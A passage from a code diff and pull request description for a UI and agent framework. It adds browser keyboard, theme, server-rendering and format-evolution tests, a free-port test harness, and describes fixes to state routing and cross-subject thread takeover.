+    case "/slot-fallback": return { title: "Slot pin fallback", content: <SlotFallbackScenario />, ownProvider: true };
     case "/appframe": return { title: "App execution planes", content: <AppFrameScenario /> };
     default: return { title: "Unknown scenario", content: <p role="alert">Unknown browser scenario: {pathname}</p> };
   }
@@ -432,7 +637,7 @@ function Harness() {
     ? current.content
     : (
       <VendoProvider
-        client={globalThis.location.pathname === "/thread" ? threadClient(baseClient) : baseClient}
+        client={globalThis.location.pathname === "/thread" ? threadClient(baseClient, pendingThread) : baseClient}
         components={components}
         theme={current.theme}
       >

--- a/packages/ui/e2e/harness/vite.config.ts
+++ b/packages/ui/e2e/harness/vite.config.ts
@@ -17,7 +17,9 @@ export default defineConfig(async () => {
     // not a layering edge the dependency guard can tell apart from a real one.
     server: {
       host: "127.0.0.1",
-      port: 4_173,
+      // Ephemeral by default so parallel lanes never collide; playwright.config
+      // reserves a free port and passes it via env + the CLI --port flag.
+      port: Number(process.env.VENDO_HARNESS_PORT) || 4_173,
       strictPort: true,
       proxy: {
         "/api/vendo": {

--- a/packages/ui/e2e/keyboard.spec.ts
+++ b/packages/ui/e2e/keyboard.spec.ts
@@ -1,5 +1,5 @@
 import { expect, test } from "@playwright/test";
-import { expectKeyboardReachability, openScenario, tabTo } from "./helpers.js";
+import { expectFocusIndicator, expectKeyboardReachability, openScenario, tabTo } from "./helpers.js";
 
 test("thread is keyboard-complete with visible focus", async ({ page }) => {
   await openScenario(page, "thread");
@@ -60,4 +60,63 @@ test("automation controls are all keyboard reachable and execute by Enter", asyn
   await tabTo(page, async () => page.evaluate(() => document.activeElement?.textContent?.trim() === "Dry run"));
   await page.keyboard.press("Enter");
   await expect(page.getByLabel("Dry run for Invoice watcher")).toBeVisible();
+});
+
+test("a running automation is killed by keyboard from run history", async ({ page }) => {
+  await openScenario(page, "automations");
+  await expect(page.getByRole("switch")).toBeVisible();
+  await tabTo(page, async () => page.evaluate(() => document.activeElement?.textContent?.trim() === "Run history"));
+  await page.keyboard.press("Enter");
+  const history = page.getByLabel("Run history for Invoice watcher");
+  await expect(history.getByText("running")).toBeVisible();
+  await tabTo(page, async () => page.evaluate(() => document.activeElement?.textContent?.trim() === "Stop"));
+  await page.keyboard.press("Enter");
+  await expect(history.getByText("stopped")).toBeVisible();
+});
+
+test("workspace tabs rove with arrows and open an app by keyboard", async ({ page }) => {
+  await openScenario(page, "page");
+  const apps = page.getByRole("tab", { name: "Apps" });
+  await expect(apps).toHaveAttribute("aria-selected", "true");
+  await expectKeyboardReachability(page, 'main[data-scenario="page"]');
+  await apps.focus();
+  await page.keyboard.press("ArrowRight");
+  await expect(page.getByRole("tab", { name: "Automations" })).toHaveAttribute("aria-selected", "true");
+  await page.keyboard.press("ArrowLeft");
+  await expect(apps).toHaveAttribute("aria-selected", "true");
+  await tabTo(page, async () => page.evaluate(() => document.activeElement?.textContent?.trim() === "Open"));
+  await page.keyboard.press("Enter");
+  await expect(page.getByText("Invoices app surface").first()).toBeVisible();
+});
+
+test("voice stage starts and stops entirely by keyboard", async ({ page }) => {
+  await openScenario(page, "stage");
+  await expect(page.getByText("Revenue is ready")).toBeVisible();
+  const toggle = page.getByRole("button", { name: "Stop voice" });
+  await toggle.focus();
+  await expectFocusIndicator(page);
+  await page.keyboard.press("Enter");
+  await expect(page.getByRole("button", { name: "Start voice" })).toBeVisible();
+  await expect(page.getByRole("status")).toContainText("Voice: idle");
+  await page.keyboard.press("Enter");
+  await expect(page.getByRole("button", { name: "Stop voice" })).toBeVisible();
+});
+
+test("activity load-more is keyboard reachable and appends a page", async ({ page }) => {
+  await openScenario(page, "activity");
+  const rows = page.locator('main[data-scenario="activity"] tbody tr');
+  await expect(rows).toHaveCount(2);
+  await tabTo(page, async () => page.evaluate(() => document.activeElement?.textContent?.trim() === "Load more"));
+  await page.keyboard.press("Enter");
+  await expect(rows).toHaveCount(3);
+});
+
+test("a destructive approval can be denied entirely by keyboard", async ({ page }) => {
+  await openScenario(page, "approval");
+  await expect(page.getByLabel("Real tool inputs")).toContainText("permanent=true");
+  // Reach the disclosure, Approve, and Deny by keyboard; deny with Enter.
+  await tabTo(page, async () => page.evaluate(() => document.activeElement?.textContent?.trim() === "Approve"));
+  await tabTo(page, async () => page.evaluate(() => document.activeElement?.textContent?.trim() === "Deny"));
+  await page.keyboard.press("Enter");
+  await expect(page.getByTestId("approval-recorder")).toHaveText('resolved: {"approve":false}');
 });

--- a/packages/ui/e2e/theme.spec.ts
+++ b/packages/ui/e2e/theme.spec.ts
@@ -1,0 +1,41 @@
+import { expect, test } from "@playwright/test";
+import { openScenario } from "./helpers.js";
+
+/**
+ * 08-ui §4 — chrome adopts the host brand through VendoTheme CSS variables only;
+ * no hardcoded brand color. Proof is on COMPUTED styles: a host theme override
+ * must actually repaint the chrome, and two different overrides must diverge (a
+ * hardcoded value could not).
+ */
+
+test("chrome computed styles derive from the host VendoTheme override", async ({ page }) => {
+  // /thread runs under the harness dark theme (background #111827, accent #38bdf8).
+  await openScenario(page, "thread");
+  const root = page.locator(".vendo-root").first();
+
+  const painted = await root.evaluate(element => {
+    const style = getComputedStyle(element);
+    return {
+      background: style.backgroundColor,
+      backgroundVar: style.getPropertyValue("--vendo-color-background").trim(),
+      accentVar: style.getPropertyValue("--vendo-color-accent").trim(),
+    };
+  });
+
+  // The painted background is the override, not any built-in default.
+  expect(painted.background).toBe("rgb(17, 24, 39)"); // #111827
+  expect(painted.backgroundVar).toBe("#111827");
+  expect(painted.accentVar).toBe("#38bdf8");
+
+  // A themed primary button paints from the accent variable, resolved.
+  const sendAccent = await page.getByRole("button", { name: "Send" }).evaluate(el => getComputedStyle(el).backgroundColor);
+  expect(sendAccent).toBe("rgb(56, 189, 248)"); // #38bdf8
+});
+
+test("a different host theme diverges — the tree boundary is not hardcoded", async ({ page }) => {
+  // /tree-themed applies the loud host theme (accent #7e22ce) to the tree boundary.
+  await openScenario(page, "tree-themed");
+  const accentVar = await page.locator(".tree-theme-boundary").first().evaluate(element =>
+    getComputedStyle(element).getPropertyValue("--vendo-color-accent").trim());
+  expect(accentVar).toBe("#7e22ce");
+});

--- a/packages/ui/playwright.config.ts
+++ b/packages/ui/playwright.config.ts
@@ -1,7 +1,33 @@
+import { createServer } from "node:net";
+import type { AddressInfo } from "node:net";
 import { fileURLToPath } from "node:url";
 import { defineConfig, devices } from "@playwright/test";
 
 const packageRoot = fileURLToPath(new URL(".", import.meta.url));
+
+/**
+ * Reserve an ephemeral free port so concurrent hardening lanes never collide on
+ * the harness dev server (the old fixed 4173 raced every parallel worktree). The
+ * OS hands back an unused port; a lane holds it only for the length of its run.
+ */
+async function freePort(): Promise<number> {
+  return new Promise<number>((resolve, reject) => {
+    const probe = createServer();
+    probe.unref();
+    probe.once("error", reject);
+    probe.listen(0, "127.0.0.1", () => {
+      const { port } = probe.address() as AddressInfo;
+      probe.close(() => resolve(port));
+    });
+  });
+}
+
+// Reserve once, then pin into the environment so every re-evaluation of this
+// config (Playwright re-imports it in each worker process) and the vite child
+// all agree on the SAME port — otherwise baseURL and the dev server diverge.
+const port = Number(process.env.VENDO_HARNESS_PORT) || (await freePort());
+process.env.VENDO_HARNESS_PORT = String(port);
+const baseURL = `http://127.0.0.1:${port}`;
 
 /** 08-ui §4–5 — deterministic Chromium verification over the localhost wire fixture. */
 export default defineConfig({
@@ -15,7 +41,7 @@ export default defineConfig({
   expect: { timeout: 7_500 },
   reporter: [["line"]],
   use: {
-    baseURL: "http://127.0.0.1:4173",
+    baseURL,
     viewport: { width: 1_280, height: 900 },
     colorScheme: "light",
     locale: "en-US",
@@ -42,13 +68,13 @@ export default defineConfig({
     },
   }],
   webServer: [{
-    command: "pnpm exec vite --config e2e/harness/vite.config.ts --host 127.0.0.1 --port 4173",
+    command: `pnpm exec vite --config e2e/harness/vite.config.ts --host 127.0.0.1 --port ${port}`,
     cwd: packageRoot,
-    url: "http://127.0.0.1:4173/thread",
+    url: `${baseURL}/thread`,
     reuseExistingServer: false,
     timeout: 60_000,
     stdout: "pipe",
     stderr: "pipe",
-    env: { NO_COLOR: "1" },
+    env: { NO_COLOR: "1", VENDO_HARNESS_PORT: String(port) },
   }],
 });

--- a/packages/ui/test/ssr.test.tsx
+++ b/packages/ui/test/ssr.test.tsx
@@ -1,7 +1,22 @@
 // @vitest-environment node
+import type { ApprovalRequest } from "@vendoai/core";
 import { renderToString } from "react-dom/server";
+import type { ReactElement } from "react";
 import { describe, expect, it } from "vitest";
 import * as chromeEntry from "../src/chrome/index.js";
+import {
+  ActivityPanel,
+  ApprovalCard,
+  AutomationsPanel,
+  NoPolicyNotice,
+  VendoOverlay,
+  VendoPage,
+  VendoPalette,
+  VendoSlot,
+  VendoStage,
+  VendoThread,
+} from "../src/chrome/index.js";
+import { AppFrame, PayloadView, TreeView } from "../src/tree/index.js";
 import {
   VendoProvider,
   useActivity,
@@ -59,4 +74,41 @@ describe("public source entries without a DOM", () => {
     const html = renderToString(<VendoProvider><EveryContractedHook /></VendoProvider>);
     expect(html).toContain("0|0|0|undefined|undefined|0|0|false|0|unavailable|");
   });
+});
+
+describe("every chrome surface server-renders without a DOM", () => {
+  const approval: ApprovalRequest = {
+    id: "apr_ssr",
+    call: { id: "call_ssr", tool: "host_email_send", args: { to: "a@example.com" } },
+    descriptor: { name: "host_email_send", description: "Send email", inputSchema: {}, risk: "write" },
+    inputPreview: "to a@example.com",
+    ctx: { principal: { kind: "user", subject: "user_ssr" }, venue: "chat", presence: "present" },
+    createdAt: "2026-07-11T12:00:00.000Z",
+  };
+  const noop = async () => ({ status: "ok", output: null } as const);
+  const tree = { formatVersion: "vendo-genui/v1", root: "root", nodes: [{ id: "root", component: "Text", props: { text: "SSR tree" } }] } as const;
+
+  // Each entry is a surface that, without the effects/DOM a browser provides,
+  // must still produce markup — proving no unguarded window/document access.
+  const surfaces: Array<[string, ReactElement]> = [
+    ["VendoThread", <VendoThread />],
+    ["VendoOverlay", <VendoOverlay />],
+    ["VendoSlot", <VendoSlot id="hero" appId="app_ssr"><span>original</span></VendoSlot>],
+    ["VendoPage", <VendoPage />],
+    ["VendoPalette", <VendoPalette />],
+    ["VendoStage", <VendoStage />],
+    ["ApprovalCard", <ApprovalCard approval={approval} onDecide={() => undefined} />],
+    ["ActivityPanel", <ActivityPanel />],
+    ["AutomationsPanel", <AutomationsPanel />],
+    ["NoPolicyNotice", <NoPolicyNotice />],
+    ["TreeView", <TreeView tree={tree} components={{}} onAction={noop} />],
+    ["PayloadView", <PayloadView payload={tree} components={{}} onAction={noop} />],
+    ["AppFrame", <AppFrame surface={{ kind: "tree", payload: tree }} />],
+  ];
+
+  for (const [name, element] of surfaces) {
+    it(`server-renders <${name}> without touching window`, () => {
+      expect(() => renderToString(<VendoProvider>{element}</VendoProvider>)).not.toThrow();
+    });
+  }
 });

--- a/packages/ui/test/tree/format-drill.test.tsx
+++ b/packages/ui/test/tree/format-drill.test.tsx
@@ -1,0 +1,89 @@
+// @vitest-environment jsdom
+import type { ComponentType } from "react";
+import { afterEach, describe, expect, it } from "vitest";
+import { cleanup, render, screen } from "@testing-library/react";
+import { VENDO_TREE_FORMAT, type ToolOutcome, type UIPayload } from "@vendoai/core";
+import {
+  PayloadView,
+  registerTreeRenderer,
+  type PayloadRendererProps,
+} from "../../src/tree/index.js";
+
+/**
+ * FORMAT-EVOLUTION FIRE DRILL — the UI renderer-registry seam (08-ui §5; 01-core §8).
+ *
+ * Renderers key by `formatVersion`. This proves the evolution seam is OPEN: a
+ * drill format registered ONLY in test code renders through the exact product
+ * registration surface (`registerTreeRenderer`), an UNregistered tag contains to
+ * a notice without breaking the page, and the v0 tree keeps rendering either way.
+ * The browser suite (e2e/format-drill.spec.ts) proves the same three in a real
+ * browser; this is the fast headless mirror.
+ *
+ * The drill tag lives ONLY in test files; it is never a default registration.
+ */
+const DRILL_FORMAT = "vendo/tree@2-drill";
+const UNREGISTERED_FORMAT = "vendo/tree@2-drill-never-registered";
+
+const ok = async (): Promise<ToolOutcome> => ({ status: "ok", output: null });
+
+afterEach(cleanup);
+
+/** A throwaway renderer for the drill format's block-list shape. */
+function DrillRenderer({ payload }: PayloadRendererProps) {
+  const blocks = (payload as { blocks?: Array<{ heading: string; body: string }> }).blocks ?? [];
+  return (
+    <section aria-label="Drill format surface">
+      {blocks.map((block, index) => (
+        <article key={index}>
+          <h3>{block.heading}</h3>
+          <p>{block.body}</p>
+        </article>
+      ))}
+    </section>
+  );
+}
+
+const drillPayload: UIPayload = {
+  formatVersion: DRILL_FORMAT,
+  blocks: [{ heading: "Quarterly revenue", body: "$4,200 across 3 invoices" }],
+};
+
+const v1Payload: UIPayload = {
+  formatVersion: VENDO_TREE_FORMAT,
+  root: "root",
+  nodes: [{ id: "root", component: "Text", props: { text: "Instant invoice" } }],
+};
+
+const components: Record<string, ComponentType> = {};
+
+describe("format-evolution fire drill — ui renderer registry", () => {
+  it("contains an unregistered format tag to a notice, never breaking the page", () => {
+    render(
+      <div>
+        <PayloadView payload={{ formatVersion: UNREGISTERED_FORMAT, blocks: [] }} components={components} onAction={ok} />
+        <p>Host content after the unregistered surface survived.</p>
+      </div>,
+    );
+    const notice = screen.getByRole("note", { name: "Unsupported UI format" });
+    expect(notice.textContent).toContain(UNREGISTERED_FORMAT);
+    expect(screen.getByText("Host content after the unregistered surface survived.")).toBeTruthy();
+  });
+
+  it("renders a registered drill format through the product registration surface", () => {
+    registerTreeRenderer(DRILL_FORMAT, DrillRenderer);
+    render(<PayloadView payload={drillPayload} components={components} onAction={ok} />);
+    expect(screen.getByRole("region", { name: "Drill format surface" })).toBeTruthy();
+    expect(screen.getByText("Quarterly revenue")).toBeTruthy();
+    expect(screen.getByText("$4,200 across 3 invoices")).toBeTruthy();
+    // No fallback notice: dispatch found the registered renderer.
+    expect(screen.queryByRole("note", { name: "Unsupported UI format" })).toBeNull();
+  });
+
+  it("keeps rendering the v0 tree identically with the drill format registered", () => {
+    registerTreeRenderer(DRILL_FORMAT, DrillRenderer);
+    render(<PayloadView payload={v1Payload} components={components} onAction={ok} />);
+    // The v1 renderer (registered by default) still owns its tag.
+    expect(screen.getByText("Instant invoice")).toBeTruthy();
+    expect(screen.queryByRole("note", { name: "Unsupported UI format" })).toBeNull();
+  });
+});

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -63,6 +63,34 @@ importers:
         specifier: ^2.1.0
         version: 2.1.9(@types/node@22.20.0)(jsdom@29.1.1(@noble/hashes@2.2.0))(lightningcss@1.32.0)(terser@5.48.0)
 
+  fixtures/chat-e2e:
+    dependencies:
+      '@vendoai/agent':
+        specifier: workspace:*
+        version: link:../../packages/agent
+      '@vendoai/core':
+        specifier: workspace:*
+        version: link:../../packages/core
+      '@vendoai/guard':
+        specifier: workspace:*
+        version: link:../../packages/guard
+      '@vendoai/store':
+        specifier: workspace:*
+        version: link:../../packages/store
+    devDependencies:
+      '@types/node':
+        specifier: ^22.0.0
+        version: 22.20.0
+      ai:
+        specifier: ^6.0.0
+        version: 6.0.28(zod@3.25.76)
+      typescript:
+        specifier: ^5.6.0
+        version: 5.9.3
+      vitest:
+        specifier: ^2.1.0
+        version: 2.1.9(@types/node@22.20.0)(jsdom@29.1.1(@noble/hashes@2.2.0))(lightningcss@1.32.0)(terser@5.48.0)
+
   fixtures/host-app:
     dependencies:
       next:


### PR DESCRIPTION
# E2E hardening wave — every block, through the public contract surface, against real neighbors

Per the hardening execution model (orchestrator = Fable; all implementation on Codex/Opus lanes): one lane per block audited its FROZEN contract line-by-line against existing e2e, wrote the missing coverage, ran it, and fixed the product bugs it exposed. E2E here means: through the public contract surface, against real neighbors (real PGlite store, real `guard.bind`, real fixture host app, real Chromium), asserting real side effects (raw SQL on the public `vendo_*` tables, real HTTP, real browser).

**Net: ~120 new e2e tests, 3 product bugs found + fixed, 1 fire drill proving the format-evolution seam opens.**

## Bug ledger (what the wave exists for)

| # | Bug | Root cause | Fix |
|---|---|---|---|
| 1 | **`vendo_state` routing** (known wave-4 follow-up, now proven): apps' state singleton (`records("vendo_state")`, id `${appId}:${subject}`) landed in the generic `vendo_records` table — the contracted host-queryable `vendo_state` table stayed empty, `appStore.delete`'s cascade missed the rows (state leaked after app deletion), and `stateStore` read a table the runtime never wrote | `vendo_state` missing from the store's reserved-collection routing | `packages/store/src/routing.ts`: routed config (first-colon id split, `(app_id,subject)` upsert, shared ephemeral overlay with `stateStore`); idempotent `ensureSchema` backfill relocates legacy rows; 8 new tests incl. cascade + ephemeral zero-disk proofs |
| 2 | **Agent thread persistence never worked against the real store** (showstopper): threads silently failed to persist through `@vendoai/store` — composite `subject:threadId` record ids rejected by the store's `thr_` id validation; `Thread` read from `record.data` while the reserved routing projects data to `{subject, messages}` with id/timestamps on the envelope; ai-SDK `UIMessage` tool parts carry explicit `undefined` props the store's `Json` validator rejects | agent written/tested only against the verbatim in-memory conformance adapter | `packages/agent/src/threads.ts`: bare-id keying, envelope reconstruction, subject check on read + read-before-delete, plain-JSON serialization |
| 3 | **Cross-subject thread-id takeover** (introduced by fix #2's bare-id keying, caught by orchestrator review): streaming to a foreign subject's threadId reused the id, and the store's upsert (`ON CONFLICT (id) DO UPDATE SET subject=…`) would overwrite the victim's thread | `resolve()` couldn't distinguish "doesn't exist" from "foreign-owned" (subject-filtered read) | closed **atomically at the store layer** (see review round below): the `vendo_threads` upsert refuses cross-subject flips (`WHERE subject = EXCLUDED.subject` + empty-RETURNING → conflict), mirrored on overlay paths; agent `resolve()` keeps a single ownership-blind pre-check as the friendly fast path. Victim-row-intact proven by SQL at unit + cross-block level, including a persist-time (mid-turn) takeover attempt |

Positive drill finding: the **format-evolution seam genuinely opens** — `uiPayloadSchema` passthrough, `validateTree`/`validateAppDocument` dispatch by tag, ui's extensible `registerTreeRenderer` registry + contained notice for unregistered tags, apps' byte-identical payload passthrough. Proven with a throwaway `vendo/tree@2-drill` format (tests only; grep-verified absent from all product src + dist).

## Coverage (before → after, by block)

| Block | New e2e | Headline behaviors newly exercised |
|---|---|---|
| core | +52 (129 total) | descriptorHash vs independent JCS+SHA-256 oracle; zod completeness sweep (every contracted type has its schema — zero missing); id-prefix schemas; `org` principal rejected; GrantConstraint op matrix; error-taxonomy forward-compat; format-drill seam proofs |
| store | +18 (88 total) | GCM nonce non-determinism; app-data-stays-plaintext-under-encryption; retention `DELETE` path; jsonb column assertions; EXPLAIN-verified GIN containment join; ephemeral runs/approvals zero-disk; exact/constrained grant round-trip; `vendo_state` routing suite |
| guard | +4 (123 total) | **descriptorHash drift → lapse → re-approval full cycle (both grant rows SQL-asserted)**; per-principal `maxCallsPerMinute` + per-run `maxWritesPerRun` through `bind` with `decidedBy:"breaker"` audit; critical unsuppressible vs grant+rule+judge simultaneously |
| agent | +3 (24 total) | stream Response consumed by the ai-SDK's own client reducer (both Vendo data parts survive); thread-id conflict refusal |
| actions | +3 (44 total) | fail-closed extraction proven through to the runtime surface (disabled = unlisted + unexecutable); away attaches only actAs headers (present-material leak-check via real fixture echo route); descriptorHash post-merge at the runtime boundary |
| apps | +13 (116 total) | ladder walk 1→2→3 with `open()`-answers-from-last-state at each rung; failing escalation keeps old rung serving; rung-4 resuming→http cover; doctored artifact (doc + zip) cannot take over a victim app id; two-principal state isolation; away-presence tool-proxy authority; format-drill passthrough |
| automations | +10 (37 e2e in fixture) | kill switch mid-run (held fn, owner-scoped, terminal-conflict); cron backlog collapses to one firing; `at` one-shot; revoke-parks-next-run; `fn:` step against a real machine incl. error-envelope hard-fail; agentic dryRun plans full surface, executes nothing (host-state proof) |
| ui | +25 vitest / +12 browser (76 + 49) | containment quartet in real Chromium (erroring node, dangling→skeleton→swap, unknown formatVersion direct + in-thread, pin fallback); keyboard-complete on all chrome surfaces incl. automations kill + approval deny; XHR/WebSocket exfil probes; computed-style theme proof; SSR renderToString of every surface; collision-safe ephemeral-port harness |
| cross-block (new `fixtures/chat-e2e`) | +9 | real agent + real guard + real store: full approval round-trip (ask → part → SQL pending → decide+remember → resume → grant → second call runs grant-authorized); deny; blocked-told-to-model; grant drift through the full chat stream; ephemeral zero-disk full turn; away runner park + 05§6 authority boundary; thread scoping + takeover refusal |

Full per-behavior coverage tables (contract § → before/after test) are in the lane reports; available on request.

## Escalations / notes on the record

- **01 §8 fn:-without-machine**: `validateTree` structurally cannot see `server`; the rule is enforced at `validateAppDocument` (which owns it). Tested from both sides; recommend the contract doc attribute the rule to the app-document layer (doc-only, no code change).
- **Layering vs e2e**: the dependency-guard (correctly) forbids block tests importing sibling blocks — cross-block e2e lives in exempt `fixtures/*` packages (`chat-e2e` new, `automations-e2e` extended). The umbrella wave inherits the same pattern.
- **OBS-1**: a blocked chat call audits 2× `policy-decision` (agent consults `check` via `needsApproval`, then bound `execute` re-runs the pipeline). Spans the agent↔guard seam; recorded, not fixed here.
- **03 §3 catalog/theme**: v0 agent injects no catalog/theme summary (umbrella folds it into `system.instructions`); no venue-conditional behavior exists to test in-block.
- `@vendoai/apps` `./testing` subpath is not exported; `fixtures/automations-e2e` carries a local `SandboxAdapter`. Adding the export is a clean follow-up.

## Dual-review round (8-angle adversarial self-pass + independent Codex review)

The review round on the wave commit found and fixed 11 further defects before this PR opened (second commit):

**Blockers**
- **Thread takeover was still open as a TOCTOU** — the resolve-time check left the whole streaming turn as a race window, and `threadStore.put`/`records("vendo_threads").put` were unprotected. Moved the refusal into the store's upsert itself (atomic, covers every caller).
- **Ephemeral state disk leak**: `stateStore.put` never registered the ephemeral subject (only `get` did), so a subsequent seam write INSERTed ephemeral data durably — split-brain between overlay and DB. Now registers on put/delete.
- **Backfill data destruction**: the `vendo_state` relocation ran unconditioned on every boot and its DELETE swept rows the INSERT never relocated (colon-less ids; mixed-version writes lost to `DO NOTHING`). Now version-keyed (`SCHEMA_VERSION` 2, runs once), DELETE scoped to relocated rows, conflicts resolved by `updated_at` (newer legacy data wins).

**Majors**
- `threads.list()` discarded the store cursor — silent truncation at 100 threads, and page-by-`created_at` vs sort-by-`updatedAt` could drop the most recently active thread. Now follows the cursor to exhaustion.
- One malformed thread row (writable via the `threadStore` helper) crashed the whole `list()`; now validated/skipped defensively.
- `vendo_state` id mechanism redesigned: additive `STORED` generated `id` column + `created_at` column + index (02 §2 allows additive columns) — point lookups use the index instead of seq-scanning an expression, `createdAt` is stable across puts (the seam guarantee core's conformance kit enforces everywhere else), pagination cursors on immutable `created_at`, and the upsert SQL lives in one shared `putStateRow` instead of two drifting copies.
- State ids made uniquely decodable (Codex): the appId segment must be colon-free (`^app_[^:]*$`), rejecting doctored ids that could alias another app/subject's row; same predicate in the backfill.
- An apps e2e test asserted an **ungranted away read runs** — contradicting guard 05 §6 (away without an app-bound automation grant parks). The test now seeds a legitimate app-bound grant. (The apps guard-fixture intentionally doesn't model away-park; noted below.)

**Accepted / recorded, not fixed**
- `records(...).delete(id)` carries no subject (frozen core §12 signature), so a narrow double-delete interleaving (A passes its ownership read, B legitimately claims the freed id, A's stale delete lands) cannot be made atomic without a contract change. Same acceptance class as the guard's single-process `AsyncLock` caveat.
- Store-vs-memory divergence pinned by test: in memory/ephemeral mode two subjects can privately use the same thread id (per-subject maps); with a store the id namespace is global and the second subject gets `conflict`.
- OBS-1: a blocked chat call audits `policy-decision` twice (agent consults `check` via `needsApproval`, bound `execute` re-runs the pipeline) — spans the agent↔guard seam, deferred.
- Overlay-merge pagination has a collation-tie edge (localeCompare vs code-unit vs DB collation) — pre-existing, affects timestamp ties only.
- Test-infra dedup follow-ups: export the scripted model via an `@vendoai/agent` `./testing` subpath and a shared grant-seeding helper (three near-copies exist across guard tests and the two fixture packages); `@vendoai/apps` `./testing` subpath export.

## Verification

- Root gates green: `pnpm build && pnpm test && pnpm typecheck && pnpm lint` (includes dependency-guard).
- UI playwright suite green in real Chromium (49 passed; 1 skip = OPENAI_API_KEY-gated live voice).
- All live-provider tests remain env-gated and untouched (Composio, e2b/Modal, live judge/agentic/voice).
- Dual-reviewed per the wave's done-definition (Codex review + adversarial orchestrator pass; findings addressed pre-merge).

https://claude.ai/code/session_01GPBYsXHVTynv7bnja7BC2m

<!-- devin-review-badge-begin -->

---

<a href="https://app.devin.ai/review/runvendo/vendo/pull/126" target="_blank">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://static.devin.ai/assets/gh-open-in-devin-review-dark.svg?v=1">
    <img src="https://static.devin.ai/assets/gh-open-in-devin-review-light.svg?v=1" alt="Open in Devin Review">
  </picture>
</a>
<!-- devin-review-badge-end -->

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Hardens E2E across all blocks via public contracts against real neighbors; adds ~120 tests, fixes three product bugs, and proves the UI format‑evolution seam. Store schema advances to v2 with a safe, idempotent backfill run by `ensureSchema`.

- **Bug Fixes**
  - `vendo_state` routing: state rows landed in `vendo_records`, cascades missed, reads hit the wrong table → routed into the dedicated `vendo_state` table, shared ephemeral overlay, and a version‑keyed backfill relocates legacy rows.
  - Agent thread persistence: composite ids and JSON shape mismatched the real store → bare‑id keying with envelope reconstruction and plain‑JSON serialization; reads and deletes scoped by subject.
  - Cross‑subject thread takeover: bare‑id reuse could overwrite another subject’s row → atomic store upsert refuses subject flips; overlay mirrors the check; victim rows stay intact.

- **New Features**
  - Cross‑block `fixtures/chat-e2e`: real `@vendoai/agent` + `@vendoai/guard` + `@vendoai/store` (PGlite) with SQL assertions; covers approval round‑trip, deny/blocked, grant drift, away runner, ephemeral, and thread scoping.
  - Automations E2E: kill switch, `fn:` step against an in‑process machine sandbox, `at` one‑shot + cron backlog collapse, and agentic dry‑run planning.
  - Format evolution drill across core/apps/ui using a test‑only `vendo/tree@2-drill`: unknown tags contain to a notice, registered tags render, and stored v0 trees render identically.

<sup>Written for commit 70f6e646151a816a58b631f22d4baf6a1d68daad. Summary will update on new commits.</sup>

<a href="https://cubic.dev/pr/runvendo/vendo/pull/126?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://www.cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>

<!-- End of auto-generated description by cubic. -->

